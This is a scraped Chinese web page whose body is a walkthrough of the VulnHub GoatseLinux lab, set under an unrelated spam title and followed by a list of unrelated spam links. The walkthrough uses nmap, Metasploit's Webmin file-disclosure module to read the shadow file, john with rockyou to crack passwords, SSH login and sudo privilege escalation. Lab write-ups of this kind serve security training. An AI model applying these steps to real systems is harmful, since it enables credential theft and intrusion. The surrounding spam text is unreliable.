当前位置: 首页 > news >正文

怎么看出是模板网站网站建设的请示

怎么看出是模板网站,网站建设的请示,iosapp开发工具,工作表格excel下载一、准备工作 kali和靶机都选择NAT模式#xff08;kali与靶机同网段#xff09; 1.靶场环境 下载链接:GoatseLinux: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 #xff08;1#xff09;扫描靶机…一、准备工作 kali和靶机都选择NAT模式kali与靶机同网段 1.靶场环境 下载链接:GoatseLinux: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 1扫描靶机开放的端口及其服务 nmap -A 192.168.101.129 2.网站的信息收集 1靶机开放了80端口,先访问靶机网站看看有什么有用的信息 http://192.168.101.129 http://192.168.101.129/goatse.html 2看看靶机的10000端口 http://192.168.101.129:10000/ 这个登录网页是基于Web的系统管理工具Webmin可能从这里寻找突破口 3. msfconsole模块 1进入到msf msfconsole 2查找webmin可以利用的脚本 search webmin 3使用该脚本 use auxiliary/admin/webmin/file_disclosure 或者用序号代替 use 1 4查看需要设置的参数 show options 5设置RHOSTS(靶机) set RHOSTS 192.168.101.129 6使用run开启攻击 run 7将得到的信息放到shadow文件里面 vim shadow cat shadow 4.john解码 john --wordlist/usr/share/wordlists/rockyou.txt shadow 得到了4个密码用户 bobby jpelman kokomo jblow guestguest gapinggoatse 三、提权 1.用goatse用户ssh登录 ssh -oKexAlgorithmsdiffie-hellman-group1-sha1 -oHostKeyAlgorithmsssh-dss -oCiphers3des-cbc goatse192.168.101.129 因为登录远程登录到系统版本比较老只能采用以上方法登录 2.sudo提权 sudo -l gaping id sudo su id
http://wiki.neutronadmin.com/news/53621/

相关文章:

  • 泉州公司建设网站企业网站建设注意点
  • 需要手机端网站建设的企业网站建设常州麦策电商
  • 中国建设工程机械网站怎么做特色网站
  • 百度推广网站可以链接到同公司另一个网站吗福田祥菱怎么样
  • 组织网站建设应该注意什么wordpress变为中文
  • 个人网站模板大全免费国外网站模板
  • 山西格泰网站建设建筑网2016农村别墅图大全
  • 国外响应式网站模板安仁做网站
  • 手机网站模板代码网站更换备案号
  • 厦门网站建设阿里东莞多地调整为中高风险地区
  • 网站的二级目录怎么做网站备案网站简介
  • 部队网站建设招标淘宝客优惠卷网站怎么做的
  • 中国icp备案的有多少企业网站wordpress客户端被墙
  • 访问网站的原理龙岗网站建设网站制作
  • 无极app定制开发公司网站模板pc版网站生成App
  • 网站建设 技术方案模板企业门户网站开发任务书
  • 鹿城做网站如何自己建营销网站
  • 济宁网站建设流程合作加盟
  • 重庆网站制作服务自己的网站怎么编辑器
  • 用aspx做的网站wordpress又拍云插件
  • 商城微网站如何做图片下载网站哪个好
  • 学校网站手机站的建设大连旧房翻新装修哪家公司好
  • 西部数码做跳转网站确定网站建设目的
  • 橙光音乐一家做音乐的网站广告语
  • 网站后台如何修改文字罗湖网站制作多少钱
  • 英文网站建设 深圳医院网站建设情况汇报
  • 做的好的大学生旅行有哪些网站好陕西天工建设有限公司网站
  • 重庆企业服务建站网站开发如何用rp做网站
  • 网站开发中常用的技术和工具上海十大营销策划公司
  • 外贸网站响应式内销网站要怎么做